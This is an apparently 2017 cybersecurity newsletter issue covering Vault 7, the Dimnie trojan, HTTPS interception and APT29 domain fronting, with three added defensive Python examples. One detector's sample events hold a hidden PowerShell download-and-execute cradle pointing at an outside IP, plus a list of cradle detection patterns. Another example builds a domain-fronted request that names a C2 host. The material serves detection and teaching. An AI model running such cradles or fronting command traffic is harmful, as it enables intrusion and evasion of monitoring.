CyberSecurity Pulse 2017-04-4

“If you set your goals ridiculously high and it’s a failure, you will fail above everyone else’s success.”
James Cameron

Analyst Insight

New Episodes in Vault 7 Case

In the last two weeks, WikiLeaks has leaked new details about Vault 7, the name given to the collection of documents allegedly linked to the Central Intelligence Agency. The documents detail a range of malware and hacking tools that can, among other things, turn phones and TVs into spying devices. Cisco Systems has already confirmed that more than 300 models of the switches it sells contain a critical vulnerability that would have allowed the CIA to take full control of the affected devices by remotely executing malicious code with a single command.

A second set of files, named DarkMatter, consists of user manuals and other documentation for exploits that mainly target Apple MacBooks. These abuse the Thunderbolt interface to let anyone with physical access to a MacBook bypass the firmware password and install one of a series of Apple-specific CIA implants. WikiLeaks has also released a third batch of the Vault 7 archive, shedding light on a set of anti-forensics tools codenamed Marble, which the agency used to hamper forensic investigators and threat intelligence companies in attributing viruses, Trojans and hacking attacks to actors linked in one way or another to the CIA.

WikiLeaks has only just begun. According to Julian Assange, the organisation's public face, it has already contacted the affected companies, so that the rest can learn the consequences of the vulnerabilities disclosed in its past (and future) releases of documents.

» More information at Wikileaks

Top Stories

A Cybersecurity Arsenal That Will Help Protect Your Election

Jigsaw and Google, both divisions of Alphabet, are launching a suite of cybersecurity tools called "Protect Your Election". The aim is to provide a set of free cyberdefences for the independent news outlets, election monitoring and audit groups, activists and human rights organizations that help elections run smoothly. The novelty here is not the tools themselves but the decision to package them in a way that makes them accessible to the people these companies feel need them most. Packaging tools together like this, for a clearly defined audience, sends a valuable message to a group that increasingly needs it, while raising the companies' profile as security-conscious organisations.

» More information at Wired

U.S. May Accuse North Korea in Bangladesh Cyberheist

US prosecutors are building a series of cases that would accuse North Korea of directing the theft of 81 million dollars from Bangladesh Bank's account at the Federal Reserve Bank of New York last year, and that would charge alleged Chinese middlemen with helping to carry out the operation. Richard Ledgett, deputy director of the US National Security Agency, has publicly suggested that North Korea may be linked to the incident, and private security firms have long pointed the finger at the Democratic People's Republic of Korea. The cases currently being pursued may not include charges against North Korean officials, but it cannot be ruled out that they will implicate the country.

» More information at Reuters

Rest of the Week's News

HTTPS Interception Weakens TLS Security

Organizations that have performed a risk assessment and determined that HTTPS inspection is a requirement should ensure their HTTPS inspection products are performing correct transport layer security (TLS) certificate validation. Products that do not properly ensure secure TLS communications and do not convey error messages to the user may further weaken the end-to-end protections that HTTPS aims to provide.
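The point of the advisory is that the server-facing side of an inspection proxy is itself a TLS client, and its configuration decides whether end-to-end protection survives. The following is an added example, not code from US-CERT or from any inspection product: it assumes a hypothetical Python proxy that opens its upstream connections with an `ssl.SSLContext`, shows the lax configuration next to the strict one, audits a context for the settings that matter, and maps an upstream validation failure to an error the user actually sees instead of silently serving the page.

```python
"""Audit the server-facing TLS client configuration of an HTTPS inspection
proxy. Added example (not code from US-CERT or from any inspection product).
Assumes the proxy, a hypothetical Python one, opens its upstream connections
with an ssl.SSLContext, so inspecting that context is enough."""
import ssl


def weak_client_context() -> ssl.SSLContext:
    """The misconfiguration the advisory warns about: any certificate, any name."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False      # must be cleared before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def strict_client_context() -> ssl.SSLContext:
    """Correct upstream side: system trust store, chain and hostname checks, TLS 1.2+."""
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_context(ctx: ssl.SSLContext) -> list:
    """Return findings; an empty list means the context validates upstream servers."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("verify_mode is not CERT_REQUIRED: any certificate chain is accepted")
    if not ctx.check_hostname:
        findings.append("check_hostname is off: a valid certificate for another name is accepted")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("minimum_version allows TLS < 1.2")
    return findings


def upstream_failure_response(exc: BaseException) -> tuple:
    """Map an upstream handshake failure to what the proxy should return to the
    client (status, message): block and explain, never serve the content."""
    if isinstance(exc, ssl.SSLCertVerificationError):
        return 502, "Upstream certificate validation failed; connection blocked: " + str(exc)
    if isinstance(exc, ssl.SSLError):
        return 502, "Upstream TLS handshake failed; connection blocked: " + str(exc)
    return 500, "Proxy error: " + str(exc)


if __name__ == "__main__":
    for name, ctx in (("weak", weak_client_context()), ("strict", strict_client_context())):
        print(name, audit_context(ctx) or "OK")
    print(upstream_failure_response(ssl.SSLCertVerificationError("CERTIFICATE_VERIFY_FAILED")))
```

Run the audit against whatever context your proxy actually uses; the empty-findings result for the strict context is the bar an inspection product has to meet on its upstream side, and the 502 path is what "convey error messages to the user" looks like in practice.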

» More information at US-CERT

Widespread Email Scam Targets GitHub Developers with Dimnie Trojan

Dimnie is a trojan that had been targeting Russian users until early this year, when a new campaign took aim at the owners of multiple GitHub repositories. One commenter in a thread reported that the initial infection e-mail was sent to an address used solely for GitHub. The e-mails carried a Microsoft Word attachment containing a malicious macro that launches PowerShell commands to download and execute the actual payloads.
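The delivery chain described above (Word macro, PowerShell, download, execute) is one of the easiest to spot in process-creation telemetry, because an Office application has little legitimate reason to spawn a script host that pulls content from the network. The following detection logic is an added example, not code from the article or from any vendor product; the events it runs over are constructed, with fields borrowed from the Sysmon Event ID 1 layout and flattened to one `key="value"` line each.

```python
"""Flag the delivery chain described above: an Office application spawning a
script host whose command line fetches and runs a payload.

Added example, not code from the article or from any product. It runs over
constructed process-creation events (a subset of Sysmon Event ID 1 fields,
flattened to one key="value" line per event)."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Download-and-execute cradles typical of macro-launched PowerShell.
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"start-bitstransfer", r"new-object\s+net\.webclient",
    r"invoke-expression", r"\biex\b", r"-enc(odedcommand)?\b", r"frombase64string",
)]
EVASION_RE = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass",
    re.IGNORECASE)
FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

# Constructed sample events (not real telemetry); 198.51.100.0/24 is documentation space.
EVENTS = r"""
ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.txt')"
ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell Get-ChildItem C:\Users"
ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Image="C:\Windows\System32\cmd.exe" CommandLine="cmd /c powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
ParentImage="C:\Windows\System32\svchost.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell Invoke-WebRequest https://updates.example.internal/patch.ps1 -OutFile C:\Temp\patch.ps1"
"""


def parse_event(line: str) -> dict:
    """Turn one key="value" line into a dict of fields."""
    return dict(FIELD_RE.findall(line))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> tuple:
    """One point per independent signal: suspicious parent/child pair,
    download cradle in the command line, evasion switches."""
    reasons = []
    if (basename(ev.get("ParentImage", "")) in OFFICE_PARENTS
            and basename(ev.get("Image", "")) in SCRIPT_HOSTS):
        reasons.append("office_spawns_script_host")
    cmd = ev.get("CommandLine", "")
    cradles = [p.pattern for p in CRADLE_PATTERNS if p.search(cmd)]
    if cradles:
        reasons.append("download_cradle:" + "|".join(cradles))
    if EVASION_RE.search(cmd):
        reasons.append("evasion_switches")
    return len(reasons), reasons


def detect(log_text: str, threshold: int = 2) -> list:
    """Return an alert for every event scoring at or above the threshold.
    A lone cradle (e.g. an admin script fetching a patch) stays below it."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"parent": basename(ev.get("ParentImage", "")),
                           "image": basename(ev.get("Image", "")),
                           "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

With the default threshold the two WINWORD-spawned events fire (the encoded-command one through cmd.exe, which is why cmd.exe is in the script-host set), while the explorer.exe and svchost.exe events do not: the parent/child relationship is the signal that separates macro-driven PowerShell from routine administrative use.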

» More information at Ars Technica UK

APT29 Group Used Domain Fronting to Evade Detection

Security firm FireEye has revealed that APT29 has been using a technique called domain fronting to hide the true endpoint of its traffic, which makes both detection and attribution harder. Domain fronting works at the application layer, over HTTPS: the connection appears, in DNS and in the TLS server name indication, to go to a host the censor already permits, while the HTTP Host header inside the encrypted tunnel names the forbidden host, and the shared front-end (such as a CDN) routes the request there.
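The two layers of a fronted request, and the one place where the mismatch between them becomes visible, are easier to see in code than in prose. The following is an added example, not code from FireEye's report or from APT29 tooling: the domain names and connection records are constructed, the registrable-domain check is a deliberate simplification (real code would consult the public suffix list), and detection assumes the monitoring point sees the decrypted Host header, which is exactly the HTTPS-inspection position discussed earlier in this issue; from DNS or the SNI alone only the front domain is visible.

```python
"""Domain fronting as described above: the TLS layer (DNS lookup and SNI) names
a permitted host, the HTTP Host header inside the tunnel names the hidden one,
and the shared front-end routes on Host.

Added example, not code from FireEye's report or from APT29 tooling. Names and
connection records are constructed; registrable() is a simplification."""
from dataclasses import dataclass
from typing import Optional


@dataclass
class FrontedRequest:
    dns_name: str        # what the resolver and DNS logs see
    sni: str             # what a passive TLS observer sees in the ClientHello
    http_request: bytes  # what only the front-end (or a TLS-terminating proxy) sees


def raw_get(host: str, path: str = "/") -> bytes:
    """Minimal HTTP/1.1 GET whose Host header names `host`."""
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            "Connection: close\r\n\r\n").encode("ascii")


def build_fronted_request(front: str, hidden: str, path: str = "/") -> FrontedRequest:
    """Outer layers name the front; the inner HTTP request names the hidden host."""
    return FrontedRequest(dns_name=front, sni=front, http_request=raw_get(hidden, path))


def host_header(raw_request: bytes) -> Optional[str]:
    """Extract the Host header (without port) from a raw HTTP/1.1 request."""
    for line in raw_request.split(b"\r\n")[1:]:
        if not line:                     # blank line ends the headers
            break
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"host":
            return value.strip().decode("ascii").split(":")[0].lower()
    return None


def registrable(name: str) -> str:
    """Last two labels, an assumed approximation of the registrable domain."""
    return ".".join(name.lower().split(".")[-2:])


def classify(sni: str, raw_request: bytes) -> Optional[str]:
    """None when SNI and Host agree; 'low' when they differ within one
    registrable domain (a common legitimate CDN setup); 'high' when they
    name different domains, which is the fronting pattern."""
    host = host_header(raw_request)
    if host is None or host == sni.lower():
        return None
    return "low" if registrable(host) == registrable(sni) else "high"


# Constructed inspection records: (client, sni, decrypted request); not real traffic.
RECORDS = [
    ("10.0.0.5", "cdn.example-front.com",
     build_fronted_request("cdn.example-front.com", "c2.example-hidden.net").http_request),
    ("10.0.0.6", "www.example.com", raw_get("www.example.com")),
    ("10.0.0.7", "static.example.org", raw_get("img.example.org", "/logo.png")),
]


def detect_fronting(records) -> list:
    """Return (client, sni, host, severity) for every SNI/Host mismatch."""
    findings = []
    for client, sni, raw in records:
        severity = classify(sni, raw)
        if severity:
            findings.append((client, sni, host_header(raw), severity))
    return findings


if __name__ == "__main__":
    fr = build_fronted_request("cdn.example-front.com", "c2.example-hidden.net")
    print("DNS/SNI see:", fr.dns_name, "| Host header says:", host_header(fr.http_request))
    for finding in detect_fronting(RECORDS):
        print(finding)
```

The first record is the fronting case: every passive observer sees `cdn.example-front.com`, and only the decrypted request reveals `c2.example-hidden.net`. The third record shows why a naive SNI-differs-from-Host rule is noisy on real networks, and why the severity split is needed before paging anyone.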

» More information at Security Affairs

Further Reading

Fake Mobile Base Stations Spreading Malware in China

» More information at The Register

Ransomware Scammers Exploited Safari Bug to Extort Porn-viewing iOS Users

» More information at Ars Technica UK

Let's Encrypt SSL Certificates Issued to PayPal Phishing Sites

» More information at Bleeping Computer